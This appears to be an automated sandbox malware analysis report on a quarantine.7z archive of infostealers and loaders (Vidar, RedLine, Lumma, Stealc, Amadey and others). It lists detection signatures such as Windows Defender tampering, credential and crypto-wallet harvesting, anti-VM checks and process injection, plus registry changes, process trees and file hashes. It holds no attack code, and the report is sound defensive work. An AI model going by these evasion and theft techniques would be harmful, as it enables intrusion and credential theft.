Malware Analysis Report

2025-04-03 09:36

Sample ID 250226-3fmrsaxqs6
Target quarantine.7z
SHA256 1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe
Tags
discovery vidar ir7am credential_access defense_evasion execution spyware stealer healer dropper evasion trojan redline testproliv infostealer amadey lumma 092155 a4d2cd persistence privilege_escalation gcleaner stealc systembc reno loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, each with the subsections Detonation Overview, Command Line, Signatures, Processes, Network, Files:

Analysis: behavioral27
Analysis: behavioral5
Analysis: behavioral9
Analysis: behavioral14
Analysis: behavioral18
Analysis: behavioral19
Analysis: behavioral25
Analysis: behavioral30
Analysis: behavioral3
Analysis: behavioral13
Analysis: behavioral16
Analysis: behavioral17
Analysis: behavioral24
Analysis: behavioral26
Analysis: behavioral8
Analysis: behavioral15
Analysis: behavioral10
Analysis: behavioral11
Analysis: behavioral23
Analysis: behavioral2
Analysis: behavioral22
Analysis: behavioral28
Analysis: behavioral1
Analysis: behavioral4
Analysis: behavioral6
Analysis: behavioral7
Analysis: behavioral20
Analysis: behavioral21
Analysis: behavioral29
Analysis: behavioral12

Analysis Overview

score
10/10

SHA256

1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe

Threat Level: Known bad

The file quarantine.7z was found to be: Known bad.

Malicious Activity Summary

Vidar family

Systembc family

Modifies Windows Defender TamperProtection settings

Stealc

Modifies Windows Defender notification settings

Gcleaner family

Stealc family

SystemBC

Healer

Modifies Windows Defender DisableAntiSpyware settings

Amadey

Healer family

RedLine

Vidar

Lumma Stealer, LummaC

Amadey family

Lumma family

RedLine payload

Redline family

Detect Vidar Stealer

Detects Healer an antivirus disabler dropper

Modifies Windows Defender Real-time Protection settings

GCleaner

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Identifies Wine through registry keys

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Event Triggered Execution: Component Object Model Hijacking

Reads user/profile data of local email clients

Windows security modification

Checks computer location settings

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Reads data files stored by FTP clients

Enumerates connected drives

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Boot or Logon Autostart Execution: Authentication Package

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Windows directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-26 23:27

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral27

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20241010-en

Max time kernel

67s

Max time network

134s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ae8b7ea42b54c54c85332ffd14cc41d30000000002000000000010660000000100002000000045887b44c83ad88d5136abd7e21083d503c13f484c39d93e8e1f5bf8644135fd000000000e80000000020000200000003f952c246091f772b36420468333483fe3cb24c14ccbc73adb586528902228ec200000006828d39e1c038318bfc4a92f7a523a6741129d1379c3810b1eeaf0d7ddce995a400000007371238750ecf8f613744640e853cc4b45ba14263b2d95e6b38e8f210c4d7d8a1bda886347804197c49bed3aebe4239a0e6080eda67cba9ea7657ec20737324a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4B3EEF21-F499-11EF-82FE-DEA5300B7D45} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774338" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50a83020a688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1552 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarD735.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 70001cba55992328514c4563c49ca744
SHA1 b7f5e636c9c1e6808241193c9b53ed115aa4e057
SHA256 b624cb0cfd506bc70ccbfec6526b95cde9ca12354923459d82067fab61c0d107
SHA512 2e80349e47744c9731d57ec730f7faf7707b5705798b9fb3e307d0da1602f6846668888c89ec85b09da62d76e80248613b0d5f51224c2a366ea161eb6c661b89

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 decf1ce29380ee49a1118295388600ca
SHA1 4fd34a6341641c951b93733424ac885765ed8906
SHA256 aad77e6d0e4b628d62cd5a8dd620a41dd1a43484a4efc037ef50db66c9fa2822
SHA512 6e03dd6d2172dee46741808224c4f2b3075e818c69e312b646f2be3a17de0e28cce505210df1f2975401905e27efdc8de77acd746a52a25971345e5ad3d6aea9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cdcf2971a33ccf8faa1db43b83506e93
SHA1 de2dfdc58f744f3261f93001732d69b906323d9d
SHA256 ba4dd92b06dc5832a451e6ecda9147b9f98c1d20728bc20205525276c5551487
SHA512 eb13cafc4a5aa28bdb6253c6df1d221f6d0b94762f1a1a594f6f9b3e6adfe3210f7d7d48509c789d3bdcc8ae8826344eda6395fb61bb354faafcf0d73c263e4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 31f935ad1f2f4a5fe2c0f4cd8c1cd0dc
SHA1 3f936541074bef8c1c7327a3037131d909f99677
SHA256 bee6be86f7efa7ec400767646027e0fe3756e7f3123730d60199625f6a8119ff
SHA512 117fddf766ae566afe2dad0ffbdca93a8b02f5f18d215d2d53ee7d34eb4ea50fc13cf86208b7a6298bbfbc6014fe228214ea0543db31e40be9af5e99ffa6df3d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d682024bc77de9a62c1894f9e5071167
SHA1 590a398d66d314b268881f920319570ab2a02efd
SHA256 a2a886acd5c1fc286cfb7228a183729d0b57a681073c89f15b9a76d7b0bf268f
SHA512 155ec4bfe5ccb8336980830be1e5ede17e14037498cf340b77ddf40be45ee5416369ebb8fa0df205e829918e757bcd6a946f6bcc7e2b69806440d501c9fcc878

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bc499739cfae054cd178e8c24a4f0b5b
SHA1 d2d4d524a9239f447f350e0f65c25331664642b1
SHA256 6c23600ed6ac271377930df7f3aaecf725b7c6361b3c07bc02f0b47f1295395e
SHA512 614295ab8357a7b7c127ef312a7591dcaa5b30cb8d175848f55be38cc0bb4c9c0cb6e01ad70b5ae81c6c70e76fe7a40db6d25c628888d867aa7a200c922597da

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c182b01a19059402ec351ca87e133eb
SHA1 858d769d7560b928c7910d72e38739d523755966
SHA256 2e70769e50842db18e70da4bd48df497fe4f150d95acbca8e3edfee45f4bd884
SHA512 f353b59eef0bb2f11cc51f0f0056baaa53e17bc4c9b311adcbcd79687b87999a7ee9dcfab41a98ba6f9447fa75ed6afca340571647ad44f328b32fc5395e659f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 00ed9e2d653713d91714493576664f9e
SHA1 c0573bbd776316ea5f28fb165af1205ec2eb1345
SHA256 abb04c6ee830c2203a8aa7a2a1fa05ed34af2fd3537ef4900972ed9b28401bfa
SHA512 674d74703f8aae84f0934c3ec11cdb46d110e56423c7f818f816db8240c5a5d57e858fb00b1ae2365bc01e57fdcd7c07964b732193e1df538ef10f3c9dbf112c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 abcdfa1cead4ff1da429ab9365824852
SHA1 6ac9931616e486d2a01872d531ac6540eadd38fc
SHA256 9484f45c5689b53c688755a46403a864947f88ab0ff42a15fe00ec2e0e979ba5
SHA512 599cd3cf5e0d181e79b398075a11a300ee088d1ef57b7ac4f5274345a8f619c920853466134cd2802fdad6c9d00b511bc8eec4b9c4eebc06afe488be504b76d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fb21db51e1cbed039be5047f9bb59a12
SHA1 f1fb0f1373a368e304b426c1a31361de034b128a
SHA256 c71d9f5060d772f232dd8454cbdcbe3678770a22e03b58fe26e3e01a0e3a0b7d
SHA512 d39c80964355eec95490ae36771eefc1c5b2876477e0be805f41790e241c7f78884bfba066d3dd4ce822d864f909ee6219903b31057c30d73e90f6efdc8f2a76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 44440d103dcba9092eb5aee60736108b
SHA1 4ef1dd0d22eef39822f5d91de8b32d8cca0a8b1f
SHA256 16b43a2d4a8aa0e21fa4976ada0482cfc6729a974c07774d0b507eaa38db9581
SHA512 4612d2c8a04d47001cf2844c3cad9384c20d2ce83c0d44b7eaadbcdc6b0a91819d39db445bd16d1ab27381d98bb9ca02a6ae9dbee644ec3d66fa7ca463e85761

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7d2e2bae63e72e23cf6b1baae47c22d3
SHA1 3468c3699abbb068b8489d99992ce06c77ec1fef
SHA256 d9d9ab0477424b72460cdbc923c09ee731b4726732da38bb1ac1deaf61e8a4b4
SHA512 ff511590bad2d26a073ca7e36de461a2adb4f837d1f10f3af443ad8208968b3aaff243a26a08931c867145e1ceb067298ca280bcefb4a12f75eb7f9e170c32da

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bd0b101e04996e1d74c507195868528b
SHA1 0c7189c3ffaeac23a406d65b004cce828cdd77ba
SHA256 d63d7c9a3ed5a842d8af787d65a8cc848a708c604326ae0cb88454464395517c
SHA512 dcb2dfe6088907182c943efcebbd54d42469a55898005e87092da037a335e2412d7a95fe5cf5cdf35db2825d12150d0b3af0f816f6137a5d72f122fa353b287b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 35ac7e57438a01a2b44ac3e5be05c1ba
SHA1 a6c79fb04413a2c4f67fdc6dba4a141ed38b4835
SHA256 bfc43e27beaa990e771e6f6666c65b600df47d1d3b8562e0ee4e216a3b33c296
SHA512 f11075dabc2d34ff17e3973a78ce1142414136c07125cf8d822bb2ad46452bda01c7e1431275a68926c1571ef3c010c560dd0bc8c69cdc49a6cbc38e057cf301

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fba793a8201e9815ddeec435dafe7519
SHA1 94443023b753e8ce4e97888a8f0620fe825a7f3b
SHA256 fb62ace77958c6076bf9541ea0846e55f77c5bba589c17f41e7a92285e302250
SHA512 ee83f3195f2a4f0742d3679f0d8379c6c20c727054646d00f40b75b78d53ecde3d26facf4ab60c9fede8002885034dafb2f7d09ea1f6984f6936482d570287df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b9b2a5b12c5b8a4a00485702952138ef
SHA1 3b6fb8b666d675b527378d58683d5ed38571d262
SHA256 9f43a23a19151d13487f7e808b21cfdb98e7a4bfcaaf42a9a346b8b4904e2e67
SHA512 69ab36f8c5ea7a6662c4c7379add3e4403ce0c6411c5b5d2643b362c65362dfe2d5071822fd9d8b57f60322fdb6adab90a06f80c1ae57182e750182b81e2407f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d1671e352f16043716fcbd1792f533f5
SHA1 c014dd37a1082cb350363110b30d20842b4064d0
SHA256 4ad6caf87f40df017cb1e8c9f2732e79c75ea5e5425f793d8d946549e19120c1
SHA512 c6b26ab39b74a2945de55845a8e20d93e11e3f4a514193729983c218e50a59d65c15762db1af2d5d756d4b6ba0bdb9c89ee78cf69eed17588da1249b3b9cf05a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de2e1b07cd2360248afbcc5ae5f26a5a
SHA1 c92d0f98c21ff9e11da080b707f52fb11d638d76
SHA256 1444e1dfe5b03a9f3d2fff8ffeddbfd0af4d357e125ebe65bec64622b7e128cf
SHA512 c4b2ec0d985c78761ecf4be024f29ba9cab78e94c3040866936c86b74a3942f4167de2fc78107b0d0dc63e8cc8d872ab02f5019883ec03e5db0559a39de4a30b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7d5fd7d1a3fd09424692ac101c7b5324
SHA1 ec248ae02c2ad8d68bd9767b41eadc51b8480efc
SHA256 7296e0b85efe3d6cdbef4d8617fc646773f602cbf693cfe19f983a11c2990e69
SHA512 a57ce92174545adaea2980feb10e6e640b2be98050d58e207e2ab06b6587d9da2014552302d646bbb059d622dacefed43de7af99090e249319e1d0415f6e4086

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a2095d9a29fc83cf0e876cae66a39dc5
SHA1 34208dba4502476b715d26404feec22676dedc4b
SHA256 86e1f9e742f40a4998089136b082595a716d26442ded6b9025f9a5acd731d515
SHA512 5c9b4dd60eabe0e98982514b2341dfb43a4207e4322cdb05bc8cddf582fbceb1e4235991c37fe3776a8fa6a3eaed817ea7a8451c2c71d98f81f5ebf65c1c7844

Analysis: behavioral5

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

150s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
